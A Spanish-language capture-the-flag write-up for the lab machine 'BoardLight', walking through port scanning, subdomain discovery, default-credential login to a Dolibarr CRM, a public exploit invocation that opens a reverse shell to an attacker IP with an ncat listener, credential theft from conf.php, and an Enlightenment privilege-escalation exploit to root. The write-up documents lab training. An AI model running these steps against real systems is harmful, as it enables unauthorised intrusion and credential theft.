# BoardLight

✍️ Autor: cY83rR0H1t 🔍 Dificultad: Fácil 📅 Fecha de creación: 25/05/2024

### 🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

```bash
ping -c 1 10.10.11.11
```

para verificar la conectividad de red.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FJLI3LXe1QZAR280tccSK%2FCaptura%20de%20pantalla%202024-09-12%20a%20las%209.46.25.png?alt=media&#x26;token=fad1df52-ff79-4e9a-b97b-cff3d5162d21" alt=""><figcaption></figcaption></figure>

A continuación, realizamos el comando:

```bash
nmap -sC -sV 10.10.11.11
```

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FaJsQe6kipzJLtNJNWKxP%2FCaptura%20de%20pantalla%202024-09-12%20a%20las%209.48.14.png?alt=media&#x26;token=47078a57-cdbd-459f-a722-744b2318066d" alt=""><figcaption></figcaption></figure>

Como podemos observar durante el escaneo que el **puerto 22** perteneciente al **servicio SSH** y el **puerto 80** perteneciente al **servicio HTTP** están abiertos por lo que a continuación se indagará más.

### 🔎 EXPLORACIÓN

Se utiliza el comando:

```bash
sudo nmap -sCV -p22,80 -v 10.10.11.11
```

para que nos proporcione más información sobre esos puertos específicamente.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FsemsTjIMDf7s5vXKgvj7%2FCaptura%20de%20pantalla%202024-09-12%20a%20las%209.49.33.png?alt=media&#x26;token=ad1151c8-dddd-473a-809c-38a28af458cb" alt=""><figcaption></figcaption></figure>

Seguimos indagando más sobre los puertos y ahora indagamos sobre el **servicio HTTP**. Se ingresó la **dirección IP** en el navegador lo que llevó a que la página web nos salga una página de una consultoría de ciberseguridad.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FunmHi6Zy9oBoEqerzaZ3%2FCaptura%20de%20pantalla%202024-09-12%20a%20las%209.51.10.png?alt=media&#x26;token=52ebcd28-5348-4e95-8409-b1eba2941bae" alt=""><figcaption></figcaption></figure>

Inspeccionamos el código fuente y no vemos nada relevante.&#x20;

Ahora buscaremos directorios con la herramienta **Gobuster** a través de:

```bash
gobuster vhost --domain board.htb -u http://10.10.11.11 \
    -w /usr/local/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt \ 
    --append-domain
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FEefk5053bVO6dCwLUPZV%2FCaptura%20de%20pantalla%202024-09-12%20a%20las%2010.41.24.png?alt=media&#x26;token=c8ca14b0-f84f-4af2-bd24-c4fe7b943c07" alt=""><figcaption></figcaption></figure>

Hemos descubierto un subdominio por lo que editamos el fichero `/etc/hosts` con el subdominio y la IP.

Con la herramienta Wfuzz vemos los directorios y archivos que contiene la página.&#x20;

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FM908zXv9xzd5s6xGBLGW%2FCaptura%20de%20pantalla%202024-09-12%20a%20las%2010.27.01.png?alt=media&#x26;token=bc7fb50b-bd4b-4591-977a-183e612a3d8e" alt=""><figcaption></figcaption></figure>

Nos llama la atención el archivo index.php por lo que realizamos la búsqueda.

```bash
http://crm.board.htb/index.php
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FKuvs9vnS5wipbbQtPuqb%2FCaptura%20de%20pantalla%202024-09-12%20a%20las%2010.47.17.png?alt=media&#x26;token=f7061483-a29d-441a-b1e1-0dfa58dfa37d" alt=""><figcaption></figcaption></figure>

Es un panel de login por lo que probamos las credenciales más comunes. Probamos admin tanto para contraseña y usuario y nos deja iniciar sesión correctamente.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FRwIjighJ0SMl9qhP86LA%2FCaptura%20de%20pantalla%202024-09-12%20a%20las%2010.48.51.png?alt=media&#x26;token=68cd8dc1-39f8-485f-af00-03a8b8c899ed" alt=""><figcaption></figcaption></figure>

### 🚀 **EXPLOTACIÓN**

Revisamos la versión por Internet si tiene alguna vulnerabilidad. Efectivamente tiene una vulnerabilidad que intentaremos explotar haciendo una Reverse Shell.

{% @github-files/github-code-block url="<https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-3025>" %}

Ejecutamos el script mientras nos ponemos en escucha para conectarnos.

```
python3 exploit.py http://crm.board.htb admin admin 10.10.16.13 9001
```

```bash
ncat -l -p 9001
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FahfgcEmXOdKH5jZIMfM1%2FCaptura%20de%20pantalla%202024-09-12%20a%20las%2011.04.46.png?alt=media&#x26;token=3f70943b-8453-4281-9605-fac704af2d95" alt=""><figcaption></figcaption></figure>

En esta etapa, tras obtener la shell en la máquina objetivo, descubrimos que el flag no se encuentra en esta máquina en particular. En cambio, el objetivo ahora es buscar las credenciales del otro usuario en esta misma máquina que indagando por documentaciones de Dolibarr se llama **Larissa**.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FStAiv31nIHadRo3tqx3T%2FCaptura%20de%20pantalla%202024-09-12%20a%20las%2011.10.33.png?alt=media&#x26;token=789479da-a26c-4615-ad2a-c5c2d87abd73" alt=""><figcaption></figcaption></figure>

Mostramos el contenido del archivo `conf.php`

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FGqb5x8kjaIouBfegvKbq%2FCaptura%20de%20pantalla%202024-09-12%20a%20las%2011.16.11.png?alt=media&#x26;token=b6f05469-6441-415f-bd15-085b1741d10a" alt=""><figcaption></figcaption></figure>

Hemos descubierto las credenciales por lo que nos conectamos a través del serivicio **SSH**.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FPgjz3xeo3W3VPWRswWcj%2FCaptura%20de%20pantalla%202024-09-12%20a%20las%2011.18.27.png?alt=media&#x26;token=533b69e1-5a6c-4d81-aefa-00db6eb97324" alt=""><figcaption></figcaption></figure>

### 🔐 **PRIVILEGIOS**

Al estar dentro y ejecutar:

```bash
whoami
```

aún no somos **root**, por lo que hacemos:

```bash
sudo -l
```

para ver si hay algo para explotar pero nos pide contraseña.

Listamos el contenido que tiene el usuario y descubrimos la flag del usuario.&#x20;

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FaByWb955K4OW4H0Mf7E3%2FCaptura%20de%20pantalla%202024-09-12%20a%20las%2011.20.17.png?alt=media&#x26;token=5cb1df56-7844-4862-8533-8d249915e2ef" alt=""><figcaption></figcaption></figure>

Utilicé **LinPEAS**, un script diseñado para identificar posibles rutas de escalamiento de privilegios en sistemas operativos Linux, Unix y macOS. Para obtener más información sobre este script, pueden consultar el siguiente enlace: [LinPEAS en GitHub](https://github.com/Cerbersec/scripts/blob/master/linux/linpeas.sh).

Primero, busqué el código del script en GitHub, lo copié y lo guardé en un archivo llamado l**inpeas.sh** en el directorio del usuario **Larissa**. Para hacer esto, utilicé el editor nano con el siguiente comando:

```bash
nano linpeas.sh
```

Dentro de este archivo, pegué todo el código obtenido de GitHub y lo guardé. Sin embargo, para ejecutar el script, necesitamos otorgarle permisos de ejecución, lo cual se hace con el siguiente comando:

```bash
chmod +x linpeas.sh
```

Luego de esto ejecutamos el script de la siguiente manera:

```
bash linpeas.sh
```

Esperamos a que el script termine su ejecución. Una vez completado, revisamos los archivos de interés. **LinPEAS** realiza un escaneo exhaustivo del sistema para identificar archivos y configuraciones que podrían presentar vulnerabilidades para la escalada de privilegios.

Entre los archivos más relevantes o recurrentes se encuentran los relacionados con Enlightenment. Tras investigar, descubrimos que la **versión 0.23** de **Enlightenment** tiene una vulnerabilidad identificada con el código \[**CVE-2022–37706**]. Además, encontramos que existe un exploit disponible para explotar esta vulnerabilidad que coincide con el exploit que tiene Larissa.

```bash
./exploit.sh
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FiN50AMqzBDQjLuIcDsje%2FCaptura%20de%20pantalla%202024-09-12%20a%20las%2011.35.48.png?alt=media&#x26;token=164d8473-99f5-4c0a-a63d-8f6d1ea55851" alt=""><figcaption></figcaption></figure>

Ya somos **root** por lo que tenemos el máximo de los privilegios y al entrar en el directorio del root y al listarlo nos sale la última bandera.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F2A7E5MzLMVQT44k9SrCC%2FCaptura%20de%20pantalla%202024-09-12%20a%20las%2011.44.51.png?alt=media&#x26;token=7c87c8c1-396a-4f33-b6d4-2f8502b58d04" alt=""><figcaption></figcaption></figure>

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FMeuMaUCPDZheTqvv1mEh%2Fimage.png?alt=media&#x26;token=5e5429f0-dbe3-4672-a79a-08a992c51082" alt=""><figcaption></figcaption></figure>